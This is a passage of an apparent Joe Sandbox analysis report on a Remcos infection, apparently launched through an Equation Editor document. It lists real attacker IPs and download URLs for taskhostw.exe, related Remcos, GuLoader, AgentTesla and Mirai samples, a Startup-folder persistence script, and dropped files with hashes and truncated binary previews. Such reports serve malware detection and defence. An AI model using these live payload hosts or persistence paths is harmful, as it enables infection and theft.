Time	Type	Description
01:28:55	API Interceptor	316x Sleep call for process: EQNEDT32.EXE modified
01:29:04	API Interceptor	5533200x Sleep call for process: svchost.exe modified
01:29:14	API Interceptor	9x Sleep call for process: wscript.exe modified
22:29:05	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.168.7.25	na.rtf	Get hash	malicious	Remcos	Browse	104.168.7.25/450/taskhostw.exe
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	104.168.7.25/450/taskhostw.exe
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	104.168.7.25/350/taskhostw.exe
107.173.4.16	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse
	na.rtf	Get hash	malicious	Remcos	Browse
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.FileRepMalware.12793.28433.exe	Get hash	malicious	Remcos, GuLoader	Browse
	file.exe	Get hash	malicious	Remcos, GuLoader	Browse
	5UQ2Xybm0q.hta	Get hash	malicious	Cobalt Strike, Remcos, GuLoader	Browse
	SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe	Get hash	malicious	Remcos, GuLoader	Browse
	PO 11001 .xls	Get hash	malicious	Remcos, GuLoader	Browse
	SDWLLRJcsY.exe	Get hash	malicious	Remcos, GuLoader	Browse
178.237.33.50	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	na.rtf	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Salary Increase Letter_Oct 2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	DHL AWB DOCS- 9284730932.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geoplugin.net	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	na.rtf	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Salary Increase Letter_Oct 2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	DHL AWB DOCS- 9284730932.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATOM86-ASATOM86NL	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	na.rtf	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Salary Increase Letter_Oct 2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	DHL AWB DOCS- 9284730932.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
AS-COLOCROSSINGUS	uSE8AyujGn.elf	Get hash	malicious	Mirai	Browse	104.170.120.236
	na.elf	Get hash	malicious	Mirai	Browse	198.12.122.175
	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse	107.173.4.16
	na.rtf	Get hash	malicious	Remcos	Browse	107.173.4.16
	na.elf	Get hash	malicious	Mirai	Browse	23.94.151.92
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	107.173.4.16
	facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.46.178.134
	Orden de Compra 097890.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.46.178.134
	172866025525495dd8e8afca3f3b56403378ef77acfe3af22ea24afc36e105013588df0d1b286.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.184
	ESUTbYTvlp.elf	Get hash	malicious	Unknown	Browse	172.245.184.204
AS-COLOCROSSINGUS	uSE8AyujGn.elf	Get hash	malicious	Mirai	Browse	104.170.120.236
	na.elf	Get hash	malicious	Mirai	Browse	198.12.122.175
	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse	107.173.4.16
	na.rtf	Get hash	malicious	Remcos	Browse	107.173.4.16
	na.elf	Get hash	malicious	Mirai	Browse	23.94.151.92
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	107.173.4.16
	facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.46.178.134
	Orden de Compra 097890.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.46.178.134
	172866025525495dd8e8afca3f3b56403378ef77acfe3af22ea24afc36e105013588df0d1b286.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.184
	ESUTbYTvlp.elf	Get hash	malicious	Unknown	Browse	172.245.184.204

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse
	na.rtf	Get hash	malicious	Remcos	Browse
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Roaming\taskhostw.exe	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse
	na.rtf	Get hash	malicious	Remcos	Browse
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\directory\name.exe	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse
	na.rtf	Get hash	malicious	Remcos	Browse
	PO-00006799868.xls	Get hash	malicious	Remcos	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290752
Entropy (8bit):	7.269682117155447
Encrypted:	false
SSDEEP:	24576:WCdxte/80jYLT3U1jfsWaNuPcgCOCYdVtL/JAc/RhmTO/wQ:fw80cTsjkWaNecFOCYDljmyL
MD5:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
SHA1:	F4A663D69419E1CDEF4D31AE003C89F6C19F23C0
SHA-256:	D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
SHA-512:	9A2141A4F2AADD4613F665CCFF25E1BE5EC4B31716F2F56982220032E688A860E28C0783626DF885ECA8F120C0C7C088B1E28438FAA6F0A1C3125BA760F8BB09
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Joe Sandbox View:	Filename: BeeaCHpaO4.exe, Detection: malicious, Browse Filename: na.rtf, Detection: malicious, Browse Filename: PO-00006799868.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...c(.g..........".................J.............@.......................... .......N....@...@.......@.....................L...\|....p..<(......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<(...p...*..................@..@.reloc..0q.......r...@..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.013130376969173
Encrypted:	false
SSDEEP:	12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
MD5:	F61E5CC20FBBA892FF93BFBFC9F41061
SHA1:	36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
SHA-256:	28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
SHA-512:	5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
Malicious:	false
Preview:	{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{40B684B2-6E04-4D52-883C-BB9A6B4BB620}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{01A01F5C-BCA2-4E40-B13F-9E3E6DA46ECE}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	3.5493571161459223
Encrypted:	false
SSDEEP:	384:SgGocNMQAzfPNoR5MbJRXrEoyubHvosZjA2py8g:SgG1k3Zj7DXvosdA2py8g
MD5:	7F5C9044299E8923F5F1CEC3DC2722E1
SHA1:	1A033B42358795645359ECF7471EFC3D9D94660B
SHA-256:	80C3413A76FD958987FE87A6988C3CFAFBFAE83CD84F51245D0C8ED00F8DDA09
SHA-512:	954281853EA0068C88FADEEBDA0F0E8692BA4DFBA60B3F79008D3C78334F0E7BE6340B00BE0640A0A1A98544DA79E5796F6E87CA1CE6C1EF4BFFA0A12E1D2DE7
Malicious:	false
Preview:	9.0.9.4.9.2.4.4.:.?.8.4.!._.;.8.].@.#.!.?..?.8.9.?.%.4.?..._.\|.:...[.[...7.2./...0.%.[.<.+.=.@.?.?.0.%.%.~.!.].'.%.'.!.%.1.0.?.=._.?...5.?.&./...3.<.6.?.(.).%.?.-...&.>.#.%.<.....[.'.].8...!.>.>.0.<.$./.+....0.,.?...-.$.5.%...[.;.8.).0.).?.?.?.[.4.=.&.3.<.`.~.2.1.?.9.:.<.4.5.\|.]...@.5.!..7..-.6.;.9.0.?.[.?.>.-.8.!.6.<.[.+.%.4.;.?.1.3.=.!.;.?.,.~.\|.&.0.$.(..].?.~.).6._.'.@.-.'.2.?.-.'.6.3.:.?.~.?...>.[.^.?.\|.5.8.%.).6.3..6.;.~.1.@.^.%.(.?.%.6...~.4.,.?...-.>.?.....%.!.%.&.%.`.>.`.~.1...6.?.?.?.1.7.#.4.0.%.4.@.).6.^.-.$.(....%.,.(.9.,.~.'...~.-.-.1.!.<.`.1.....).0._.(./.6.>.2.!...2.0..$.,.:.~.2.&.^.#...%.7.1.).%.(.>.?.`.,.<.$.).@.?.,.>.4./.3.?.]...7.>...2.^.9.#.[.?.~.,.7.4.(.?.\|.?.0.).-.1.?.>.?.<.(.7.(.:.6.2...<.+.).4.1.?.5.=.<.(.?.4.~.].8.:.%.=.:.+.1.&.5.?.@.0.7.7...3.8.`.!.=.?.&.,.?._.(.^.+.,.4..9.(...+.3.$.4.^.).7.'.5._.\|.@.?.<.)..'.!.1.+.#.?.2./.%.?.^.,.2.?.@.5.3.-.:...<.?.;.?.3.`.*.,.2.?.<._.).4.&.7.1.%.2._._.`.?.,.[.'.+.%._.(._.>.0.3.:.5.$.=.....8./.-.6.....&.-.,.$.^.].#.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7D5F291B-FC4E-4817-A29C-C6E550DE4245}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Citlaltpetl

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	data
Category:	dropped
Size (bytes):	494592
Entropy (8bit):	7.5383843814540175
Encrypted:	false
SSDEEP:	12288:iU98JzlqYLe9tSpC5R8F0B5hAKmUAhVAoMIAj:2s2e9tS08FK5MUN1j
MD5:	68E968B0759CF46217226477C26C2FB0
SHA1:	ACBB76B2C0808F932D217AE73184BA14B18D27B8
SHA-256:	604A0CC31BA6D8753E394982E8B84A59B260179B2313F314CAC53CEB663C996B
SHA-512:	8016E87C2B29BE1802DF384F46F0568EF4EA2BE22732BD554AA7E95FF12373B0381AD0CFD8CA1C795E8B5D7DC94E210ACC8F32DD21CBBCA4ECB42D6E48FA8709
Malicious:	false
Preview:	...IBRXL=83R..IA.XL983RZ.IARXL983RZIIARXL983RZIIARXL983RZIIAJYL96,.TI.H.y.8t.s.! 2r(>V_A37i* <6#M.Q7z;</r1".\|\|.z$&%7vA42.RZIIARX@B...@.7.H.2q".,..n?.B.G.w$.S.,...FeH.7.#.&.#.M..X7.H.2.\|.-.S.?...FJ).$...-2V.Fr0.7.[.&.#.M$A.7...3.".,..`?.B.G.w.%.S.,.%ZP{H.7IARXL983RZIIARXL983RZIIA..L9t2UZ..4XL983RZI.APYG863R(LIADZL983R..JARHL98.WZII.RX\983PZILASXL983WZHIARXL9.;RZMIARXL9:3R.IIQRX\983RJIIQRXL983BZIIARXL983R.OAVYL98.UZA.ARXL983RZIIARXL983R.NI.iXLi.5RbIIARXL983RZIIARXL98.\IQARX..>3.ZIIARXL983RZ.LAR]L983RZIIARXL983RZIIARXL983\|.,15RXL.I6RZYIARI987RZIIARXL983RZIiAR8bK\R&;II.+YL9.6RZ3HAR.I983RZIIARXL98sRZ.g%3,-983..IIAB_L963RZ.OARXL983RZIIAR.L9..&6:IARXE983RNIAPXL9.5RZIIARXL983RZ.IA.v+_QW!ZIyCRXL.?3R^IIAR_L983RZIIARXL9x3R.g;2 ;L98;.ZII.UXLu83R^NIARXL983RZIIA.XLy.A76&*AR.w983.]II}RXLi?3RZIIARXL983R.II.RXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL98

C:\Users\user\AppData\Local\Temp\aut2C8D.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	data
Category:	dropped
Size (bytes):	400390
Entropy (8bit):	7.97463545286396
Encrypted:	false
SSDEEP:	12288:mwkhSXui11zbhQKe0I5igjSUNjgoDVSFnq:m251z25ZeUNjg+Vz
MD5:	336DC045C8C6A4764B31D43FD360B020
SHA1:	0DBEE41F0BF6FEF4F8C7BD47C6FD386CB572067B
SHA-256:	D7C56FFC8A357E732D1922254D35AC9EF9FA39B15F0C4509E5D0CF17CCB64EC4
SHA-512:	A7C4FE0FBEFA21D7D1217B75B3BC44E08582FC69FAED7144736375D7934CAF25FA40441A4AE21BEF339F056CDB927F8E42F94CAA5B9140C42A1F309DAB88509B
Malicious:	false
Preview:	EA06......;4..J.L..&u-..A.V)........j@.y....t..2s6.z...#?y.N...:C .\...~.3..eR...GM.Tf...._r..7....$.If.j..e..M.....F....&...\d^Yf..n..hY.?.kw.i.yyf....Yi.."G..Ad~.n..X........-.T....s?F.Jp.Md7'-.U..k..?7.V.h$..M.Ps.}.[.3..,.Xm....X8.\|4....B......`....Q.d..2.......[Z..B.G.M.u)E2.A.V......A.R....\......b.Z..(50.z.Z..,b1;.V...x.....MD...P.\.X.!;....5`..q...0 ._.uN..m5.e..5.X.h.n...I....OT.g....f.A.W@v~..Y1.....L.Z.....L.q7.,.m4....K.T..M';+..5....A.K. ........fr.h...........Bni..?.b.9.Gd.i...E..eT.M...Bq...?.....J......I.......gR......o..3.F...v.,N. ..F.X.]@.J.8....V)....o6.J.5,...X.Wi4....i...\|..M&........~9l..R.L&...6.Pw[[..qj......R.,r...x..: ...Y...9..ja...l..e.7...i8....B..+.I,2........qZ.~a.Z.a..._I......s8^g.y....)@.....g.....7..g0.,.@...'.2.B.=....I...gF.........Y...t....Y...R...iw...T..&.:......J..2>....X.......S...p.Y..5.`......3f.!\|..9..J.$....-.j.B.@q.9.*...Ru>.m2sP..........~.Q .g.W..!`...[...f.V... ..8.Z...t.L.=..z..%f...n.\|..B...4'..

C:\Users\user\AppData\Local\Temp\aut2D49.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	data
Category:	dropped
Size (bytes):	12940
Entropy (8bit):	7.727914831066413
Encrypted:	false
SSDEEP:	192:TP936RuGCkiaFqfIh11paNCIegDLay+QeRwKLR8cWP2kc67QNjpgDUeq6Ga:YRFqfIfaRHayZwLR8rJc67QNjpgg2v
MD5:	A9350F97650A3D649560ABAA38CCBE7C
SHA1:	C01DDE0AC867BBE9ED8D93713C993751E8B1FED6
SHA-256:	912FE5024C06FBB6643CC0AFC64414ECDDA4A251CC6D1F5805960B544B73C53A
SHA-512:	8A2024CC0F6C3B72AD554DED7A93D61024ECDB5AF56B550F6A145468EB87CD7AD583A8A1B0C4390DCB5082AC66FCC247CD8299C3A598D95A192220A597009197
Malicious:	false
Preview:	EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<\|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...\|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...\|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5

C:\Users\user\AppData\Local\Temp\aut32A5.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	400390
Entropy (8bit):	7.97463545286396
Encrypted:	false
SSDEEP:	12288:mwkhSXui11zbhQKe0I5igjSUNjgoDVSFnq:m251z25ZeUNjg+Vz
MD5:	336DC045C8C6A4764B31D43FD360B020
SHA1:	0DBEE41F0BF6FEF4F8C7BD47C6FD386CB572067B
SHA-256:	D7C56FFC8A357E732D1922254D35AC9EF9FA39B15F0C4509E5D0CF17CCB64EC4
SHA-512:	A7C4FE0FBEFA21D7D1217B75B3BC44E08582FC69FAED7144736375D7934CAF25FA40441A4AE21BEF339F056CDB927F8E42F94CAA5B9140C42A1F309DAB88509B
Malicious:	false
Preview:	EA06......;4..J.L..&u-..A.V)........j@.y....t..2s6.z...#?y.N...:C .\...~.3..eR...GM.Tf...._r..7....$.If.j..e..M.....F....&...\d^Yf..n..hY.?.kw.i.yyf....Yi.."G..Ad~.n..X........-.T....s?F.Jp.Md7'-.U..k..?7.V.h$..M.Ps.}.[.3..,.Xm....X8.\|4....B......`....Q.d..2.......[Z..B.G.M.u)E2.A.V......A.R....\......b.Z..(50.z.Z..,b1;.V...x.....MD...P.\.X.!;....5`..q...0 ._.uN..m5.e..5.X.h.n...I....OT.g....f.A.W@v~..Y1.....L.Z.....L.q7.,.m4....K.T..M';+..5....A.K. ........fr.h...........Bni..?.b.9.Gd.i...E..eT.M...Bq...?.....J......I.......gR......o..3.F...v.,N. ..F.X.]@.J.8....V)....o6.J.5,...X.Wi4....i...\|..M&........~9l..R.L&...6.Pw[[..qj......R.,r...x..: ...Y...9..ja...l..e.7...i8....B..+.I,2........qZ.~a.Z.a..._I......s8^g.y....)@.....g.....7..g0.,.@...'.2.B.=....I...gF.........Y...t....Y...R...iw...T..&.:......J..2>....X.......S...p.Y..5.`......3f.!\|..9..J.$....-.j.B.@q.9.*...Ru>.m2sP..........~.Q .g.W..!`...[...f.V... ..8.Z...t.L.=..z..%f...n.\|..B...4'..

C:\Users\user\AppData\Local\Temp\aut3313.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	12940
Entropy (8bit):	7.727914831066413
Encrypted:	false
SSDEEP:	192:TP936RuGCkiaFqfIh11paNCIegDLay+QeRwKLR8cWP2kc67QNjpgDUeq6Ga:YRFqfIfaRHayZwLR8rJc67QNjpgg2v
MD5:	A9350F97650A3D649560ABAA38CCBE7C
SHA1:	C01DDE0AC867BBE9ED8D93713C993751E8B1FED6
SHA-256:	912FE5024C06FBB6643CC0AFC64414ECDDA4A251CC6D1F5805960B544B73C53A
SHA-512:	8A2024CC0F6C3B72AD554DED7A93D61024ECDB5AF56B550F6A145468EB87CD7AD583A8A1B0C4390DCB5082AC66FCC247CD8299C3A598D95A192220A597009197
Malicious:	false
Preview:	EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<\|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...\|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...\|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5

C:\Users\user\AppData\Local\Temp\aut651A.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	400390
Entropy (8bit):	7.97463545286396
Encrypted:	false
SSDEEP:	12288:mwkhSXui11zbhQKe0I5igjSUNjgoDVSFnq:m251z25ZeUNjg+Vz
MD5:	336DC045C8C6A4764B31D43FD360B020
SHA1:	0DBEE41F0BF6FEF4F8C7BD47C6FD386CB572067B
SHA-256:	D7C56FFC8A357E732D1922254D35AC9EF9FA39B15F0C4509E5D0CF17CCB64EC4
SHA-512:	A7C4FE0FBEFA21D7D1217B75B3BC44E08582FC69FAED7144736375D7934CAF25FA40441A4AE21BEF339F056CDB927F8E42F94CAA5B9140C42A1F309DAB88509B
Malicious:	false
Preview:	EA06......;4..J.L..&u-..A.V)........j@.y....t..2s6.z...#?y.N...:C .\...~.3..eR...GM.Tf...._r..7....$.If.j..e..M.....F....&...\d^Yf..n..hY.?.kw.i.yyf....Yi.."G..Ad~.n..X........-.T....s?F.Jp.Md7'-.U..k..?7.V.h$..M.Ps.}.[.3..,.Xm....X8.\|4....B......`....Q.d..2.......[Z..B.G.M.u)E2.A.V......A.R....\......b.Z..(50.z.Z..,b1;.V...x.....MD...P.\.X.!;....5`..q...0 ._.uN..m5.e..5.X.h.n...I....OT.g....f.A.W@v~..Y1.....L.Z.....L.q7.,.m4....K.T..M';+..5....A.K. ........fr.h...........Bni..?.b.9.Gd.i...E..eT.M...Bq...?.....J......I.......gR......o..3.F...v.,N. ..F.X.]@.J.8....V)....o6.J.5,...X.Wi4....i...\|..M&........~9l..R.L&...6.Pw[[..qj......R.,r...x..: ...Y...9..ja...l..e.7...i8....B..+.I,2........qZ.~a.Z.a..._I......s8^g.y....)@.....g.....7..g0.,.@...'.2.B.=....I...gF.........Y...t....Y...R...iw...T..&.:......J..2>....X.......S...p.Y..5.`......3f.!\|..9..J.$....-.j.B.@q.9.*...Ru>.m2sP..........~.Q .g.W..!`...[...f.V... ..8.Z...t.L.=..z..%f...n.\|..B...4'..

C:\Users\user\AppData\Local\Temp\aut6605.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	12940
Entropy (8bit):	7.727914831066413
Encrypted:	false
SSDEEP:	192:TP936RuGCkiaFqfIh11paNCIegDLay+QeRwKLR8cWP2kc67QNjpgDUeq6Ga:YRFqfIfaRHayZwLR8rJc67QNjpgg2v
MD5:	A9350F97650A3D649560ABAA38CCBE7C
SHA1:	C01DDE0AC867BBE9ED8D93713C993751E8B1FED6
SHA-256:	912FE5024C06FBB6643CC0AFC64414ECDDA4A251CC6D1F5805960B544B73C53A
SHA-512:	8A2024CC0F6C3B72AD554DED7A93D61024ECDB5AF56B550F6A145468EB87CD7AD583A8A1B0C4390DCB5082AC66FCC247CD8299C3A598D95A192220A597009197
Malicious:	false
